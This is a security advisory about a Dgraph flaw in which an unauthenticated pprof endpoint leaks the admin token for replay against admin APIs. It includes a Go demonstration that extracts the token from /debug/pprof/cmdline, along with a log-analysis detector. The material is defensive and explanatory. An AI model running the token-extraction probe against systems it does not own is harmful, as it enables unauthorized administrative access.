JustAppSec

Dgraph fixes unauthenticated pprof token leak enabling admin takeover

1 min read · Published 15 Apr 2026 · Updated 15 Apr 2026 · Source: CVEProject (cvelistV5)

TL;DR — Dgraph Alpha exposes /debug/pprof/cmdline without auth, leaking the configured admin token and enabling unauthenticated callers to reach admin-only endpoints by replaying it.

What happened

Dgraph is an open-source distributed graph database with a native GraphQL interface. Its “Alpha” nodes serve the HTTP endpoints used for queries and for administration.

CVE-2026-40173 describes a critical credential-disclosure chain. Dgraph Alpha serves Go’s pprof diagnostics under /debug/pprof/ without authentication, and /debug/pprof/cmdline returns the full process command line, including any admin token configured via --security "token=...". An attacker who can reach the Alpha HTTP port therefore reads the token with one unauthenticated request, then replays it in the X-Dgraph-AuthToken header against admin-only endpoints such as /admin/config/cache_mb, gaining privileged administrative access (configuration and operational control actions) with no prior credentials. The precondition is simply that the Alpha HTTP port is reachable by untrusted parties.

Why this matters: diagnostic endpoints left reachable on production listeners are a recurring failure mode. The admin API’s token check is only as strong as the weakest route that can disclose the token, and once a secret surfaces through an ancillary endpoint, the “strong auth” in front of the privileged surface is a paper barrier.
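The following Go program is an added example, not Dgraph code or anything from the CVE record. It reproduces the failure mode in miniature: the real net/http/pprof Cmdline handler is registered on the same mux as a (hypothetical) public API, a Dgraph-style --security "token=...; whitelist=..." flag is appended to this process’s argv, and an unauthenticated probe pulls the token back out of the NUL-separated response. Beside it sits the hardened arrangement, where the public mux carries no pprof routes and diagnostics live on a separate mux meant for a loopback or management-only listener. The token value, the /query route and the whitelist CIDR are constructed for the demonstration.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/http/pprof"
	"os"
	"strings"
)

// queryHandler stands in for the public API surface (hypothetical, not Dgraph code).
func queryHandler(w http.ResponseWriter, r *http.Request) {
	fmt.Fprintln(w, "ok")
}

// exposedMux reproduces the failure mode: pprof handlers registered on the mux that
// also serves the public API. A blank import of net/http/pprof does the same thing
// to http.DefaultServeMux, which is how it usually happens by accident.
func exposedMux() *http.ServeMux {
	mux := http.NewServeMux()
	mux.HandleFunc("/query", queryHandler)
	mux.HandleFunc("/debug/pprof/cmdline", pprof.Cmdline)
	return mux
}

// hardenedPublicMux carries only the API. Diagnostics go on diagnosticsMux, which
// should be bound to 127.0.0.1 or a management network, never the public port.
func hardenedPublicMux() *http.ServeMux {
	mux := http.NewServeMux()
	mux.HandleFunc("/query", queryHandler)
	return mux
}

func diagnosticsMux() *http.ServeMux {
	mux := http.NewServeMux()
	mux.HandleFunc("/debug/pprof/cmdline", pprof.Cmdline)
	return mux
}

// tokenFromCmdline parses the NUL-separated argv that pprof's cmdline handler emits
// and extracts the token from a Dgraph-style --security "token=...; whitelist=..." flag.
// It accepts both "--security=VALUE" and "--security VALUE"; returns "" if absent.
func tokenFromCmdline(body string) string {
	args := strings.Split(body, "\x00")
	for i, a := range args {
		var val string
		switch {
		case strings.HasPrefix(a, "--security="):
			val = strings.TrimPrefix(a, "--security=")
		case a == "--security" && i+1 < len(args):
			val = args[i+1]
		default:
			continue
		}
		for _, kv := range strings.Split(val, ";") {
			kv = strings.TrimSpace(kv)
			if strings.HasPrefix(kv, "token=") {
				return strings.TrimPrefix(kv, "token=")
			}
		}
	}
	return ""
}

// probeCmdline is the unauthenticated check: fetch /debug/pprof/cmdline and report
// the status plus any token the body discloses. Anything other than 200 is treated
// as "not exposed" (the hardened mux answers 404).
func probeCmdline(baseURL string) (int, string, error) {
	resp, err := http.Get(baseURL + "/debug/pprof/cmdline")
	if err != nil {
		return 0, "", err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return 0, "", err
	}
	if resp.StatusCode != http.StatusOK {
		return resp.StatusCode, "", nil
	}
	return resp.StatusCode, tokenFromCmdline(string(body)), nil
}

// simulateLeak injects a constructed --security flag into this process's argv (which is
// exactly what pprof.Cmdline serves), starts both muxes in-process, and returns the
// token each one leaks to an unauthenticated caller.
func simulateLeak(token string) (exposedToken, hardenedToken string, err error) {
	n := len(os.Args)
	os.Args = append(os.Args, "--security", "token="+token+"; whitelist=10.0.0.0/8")
	defer func() { os.Args = os.Args[:n] }()

	exposed := httptest.NewServer(exposedMux())
	defer exposed.Close()
	hardened := httptest.NewServer(hardenedPublicMux())
	defer hardened.Close()

	if _, exposedToken, err = probeCmdline(exposed.URL); err != nil {
		return "", "", err
	}
	_, hardenedToken, err = probeCmdline(hardened.URL)
	return exposedToken, hardenedToken, err
}

func main() {
	leaked, safe, err := simulateLeak("constructed-admin-token")
	if err != nil {
		panic(err)
	}
	fmt.Printf("exposed mux leaks token:         %q\n", leaked)
	fmt.Printf("hardened public mux leaks token: %q\n", safe)
}
```

Pointing probeCmdline at a real Alpha URL (for example http://alpha.internal:8080) is the same check you would run during inventory: a 200 with a non-empty token means the listener is still exposing argv to whoever can reach it.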

Who is impacted

  • Deployments running Dgraph where Alpha’s HTTP listener is reachable by untrusted networks and an admin token is configured via --security "token=...".
Component    Affected versions (per CVE record)    Fixed version (per CVE record)
dgraph       <= 25.3.1                             25.3.2

What to do now

  • Follow vendor remediation guidance and apply the latest patched release available at the time of writing.

    "This issue has been fixed in version 25.3.2."

  • Inventory where Dgraph Alpha HTTP is exposed (Kubernetes Service type, ingress rules, load balancers, security groups) and confirm /debug/pprof/* is not reachable from untrusted networks.
  • Treat this as a credential exposure scenario: rotate the Dgraph admin token and review recent access to /debug/pprof/cmdline and /admin/* endpoints in HTTP logs.
  • If you pass secrets on the process command line (e.g., --security "token=..."), remember that argv is readable by anything that can see ps output, /proc/<pid>/cmdline, crash reports, metrics or diagnostic endpoints in your runtime environment. Reassess each of those surfaces, and prefer a mechanism that keeps the secret out of argv where the software supports one.
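For the log-review step above, here is an added Go example (not Dgraph code, and not the CVE record’s detection guidance) that walks access logs from a reverse proxy in front of an Alpha listener and flags the replay chain: a successful unauthenticated read of /debug/pprof/*, followed by calls to /admin* from the same client. It also flags admin calls from sources outside RFC 1918 and loopback space, which is an assumed stand-in for your real management ranges. The log lines are constructed in nginx “combined” format and are not real Dgraph output.

```go
package main

import (
	"bufio"
	"fmt"
	"net"
	"regexp"
	"strconv"
	"strings"
)

// sampleLog is a constructed excerpt of nginx "combined" access logs from an ingress
// fronting a Dgraph Alpha HTTP listener. The addresses are documentation ranges and
// the requests are invented for this example; none of this is real Dgraph output.
const sampleLog = `10.0.3.7 - - [15/Apr/2026:09:12:01 +0000] "GET /debug/pprof/cmdline HTTP/1.1" 200 87 "-" "Go-http-client/1.1"
203.0.113.45 - - [15/Apr/2026:09:14:22 +0000] "GET /debug/pprof/cmdline HTTP/1.1" 200 87 "-" "curl/8.5.0"
203.0.113.45 - - [15/Apr/2026:09:14:31 +0000] "GET /admin/config/cache_mb HTTP/1.1" 200 44 "-" "curl/8.5.0"
198.51.100.9 - - [15/Apr/2026:09:20:05 +0000] "POST /query HTTP/1.1" 200 512 "-" "dgo/230.0.1"
198.51.100.9 - - [15/Apr/2026:09:21:40 +0000] "GET /admin/config/cache_mb HTTP/1.1" 200 44 "-" "curl/8.5.0"`

// lineRE captures source IP, timestamp, method, path and status from a combined-format line.
var lineRE = regexp.MustCompile(`^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})`)

type entry struct {
	src, ts, method, path string
	status                int
}

type finding struct {
	Src, Kind, Detail string
}

func parseLine(s string) (entry, bool) {
	m := lineRE.FindStringSubmatch(s)
	if m == nil {
		return entry{}, false
	}
	status, _ := strconv.Atoi(m[5])
	return entry{src: m[1], ts: m[2], method: m[3], path: m[4], status: status}, true
}

// trustedSource treats RFC 1918 and loopback addresses as the operator's own network.
// This is an assumption for the example; substitute your real management CIDRs.
func trustedSource(ip string) bool {
	p := net.ParseIP(ip)
	return p != nil && (p.IsPrivate() || p.IsLoopback())
}

// analyze makes one pass over the log and reports:
//   pprof-from-untrusted  a 200 on /debug/pprof/* from outside trusted space (token likely read)
//   admin-after-pprof     an /admin* call from any client that earlier read pprof (the replay chain)
//   admin-from-untrusted  an /admin* call from outside trusted space with no pprof read seen
func analyze(log string) []finding {
	var out []finding
	pprofSeen := map[string]bool{}
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		e, ok := parseLine(sc.Text())
		if !ok {
			continue
		}
		switch {
		case strings.HasPrefix(e.path, "/debug/pprof/") && e.status == 200:
			pprofSeen[e.src] = true
			if !trustedSource(e.src) {
				out = append(out, finding{e.src, "pprof-from-untrusted", e.ts + " " + e.method + " " + e.path})
			}
		case strings.HasPrefix(e.path, "/admin"):
			detail := fmt.Sprintf("%s %s %s -> %d", e.ts, e.method, e.path, e.status)
			if pprofSeen[e.src] {
				out = append(out, finding{e.src, "admin-after-pprof", detail})
			} else if !trustedSource(e.src) {
				out = append(out, finding{e.src, "admin-from-untrusted", detail})
			}
		}
	}
	return out
}

func main() {
	for _, f := range analyze(sampleLog) {
		fmt.Printf("%-14s %-22s %s\n", f.Src, f.Kind, f.Detail)
	}
}
```

Against the sample, the internal 10.0.3.7 pprof read produces nothing on its own, 203.0.113.45 produces the two-step chain, and 198.51.100.9 is flagged for touching the admin API from outside trusted space without a preceding pprof read (a token leaked earlier, or through another channel, would look exactly like this). Feed the function your proxy or ingress logs for the window before the patch; the admin-after-pprof hits are the ones that should drive token rotation and a review of what configuration was changed.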

Content is AI-assisted and reviewed by our team, but issues may be missed and best practices evolve rapidly; send corrections to [email protected]. Always consult official documentation and validate key implementation decisions before making design or security choices.
